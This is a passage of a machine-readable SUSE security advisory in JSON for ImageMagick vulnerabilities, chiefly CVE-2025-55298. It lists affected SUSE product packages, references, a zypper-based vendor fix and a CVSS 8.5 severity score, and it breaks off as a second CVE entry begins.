"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-devel-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-devel-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-devel-7.0.7.34-150200.10.62.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-devel-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagick++-devel-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagick++-devel-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagick++-devel-7.0.7.34-150200.10.62.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagick++-devel-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:perl-PerlMagick-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:perl-PerlMagick-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:perl-PerlMagick-7.0.7.34-150200.10.62.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:perl-PerlMagick-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:ImageMagick-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:ImageMagick-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:ImageMagick-devel-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:ImageMagick-devel-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:libMagick++-devel-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:libMagick++-devel-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:perl-PerlMagick-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:perl-PerlMagick-7.0.7.34-150200.10.62.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-55298",
"url": "https://www.suse.com/security/cve/CVE-2025-55298"
},
{
"category": "external",
"summary": "SUSE Bug 1248780 for CVE-2025-55298",
"url": "https://bugzilla.suse.com/1248780"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Enterprise Storage 7.1:ImageMagick-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Enterprise Storage 7.1:ImageMagick-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Enterprise Storage 7.1:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Enterprise Storage 7.1:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Enterprise Storage 7.1:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Enterprise Storage 7.1:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Enterprise Storage 7.1:ImageMagick-devel-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Enterprise Storage 7.1:ImageMagick-devel-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Enterprise Storage 7.1:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Enterprise Storage 7.1:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Enterprise Storage 7.1:libMagick++-devel-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Enterprise Storage 7.1:libMagick++-devel-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Enterprise Storage 7.1:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Enterprise Storage 7.1:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Enterprise Storage 7.1:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Enterprise Storage 7.1:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Enterprise Storage 7.1:perl-PerlMagick-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Enterprise Storage 7.1:perl-PerlMagick-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:ImageMagick-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:ImageMagick-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:ImageMagick-devel-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:ImageMagick-devel-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:libMagick++-devel-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:libMagick++-devel-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:perl-PerlMagick-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:perl-PerlMagick-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-7.0.7.34-150200.10.62.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-devel-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-devel-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-devel-7.0.7.34-150200.10.62.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-devel-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagick++-devel-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagick++-devel-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagick++-devel-7.0.7.34-150200.10.62.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagick++-devel-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:perl-PerlMagick-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:perl-PerlMagick-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:perl-PerlMagick-7.0.7.34-150200.10.62.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:perl-PerlMagick-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:ImageMagick-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:ImageMagick-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:ImageMagick-devel-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:ImageMagick-devel-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:libMagick++-devel-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:libMagick++-devel-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:perl-PerlMagick-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:perl-PerlMagick-7.0.7.34-150200.10.62.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 8.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Enterprise Storage 7.1:ImageMagick-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Enterprise Storage 7.1:ImageMagick-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Enterprise Storage 7.1:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Enterprise Storage 7.1:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Enterprise Storage 7.1:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Enterprise Storage 7.1:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Enterprise Storage 7.1:ImageMagick-devel-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Enterprise Storage 7.1:ImageMagick-devel-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Enterprise Storage 7.1:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Enterprise Storage 7.1:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Enterprise Storage 7.1:libMagick++-devel-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Enterprise Storage 7.1:libMagick++-devel-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Enterprise Storage 7.1:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Enterprise Storage 7.1:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Enterprise Storage 7.1:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Enterprise Storage 7.1:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Enterprise Storage 7.1:perl-PerlMagick-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Enterprise Storage 7.1:perl-PerlMagick-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:ImageMagick-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:ImageMagick-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:ImageMagick-devel-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:ImageMagick-devel-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:libMagick++-devel-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:libMagick++-devel-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:perl-PerlMagick-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:perl-PerlMagick-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-7.0.7.34-150200.10.62.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-devel-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-devel-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-devel-7.0.7.34-150200.10.62.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-devel-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagick++-devel-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagick++-devel-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagick++-devel-7.0.7.34-150200.10.62.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagick++-devel-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:perl-PerlMagick-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:perl-PerlMagick-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:perl-PerlMagick-7.0.7.34-150200.10.62.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:perl-PerlMagick-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:ImageMagick-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:ImageMagick-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:ImageMagick-devel-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:ImageMagick-devel-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:libMagick++-devel-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:libMagick++-devel-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:perl-PerlMagick-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:perl-PerlMagick-7.0.7.34-150200.10.62.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-09-10T18:01:34Z",
"details": "important"
}
],
"title": "CVE-2025-55298"
},
{
"cve": "CVE-2025-57803",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-57803"
}
],
"notes": [
{
"category": "general",
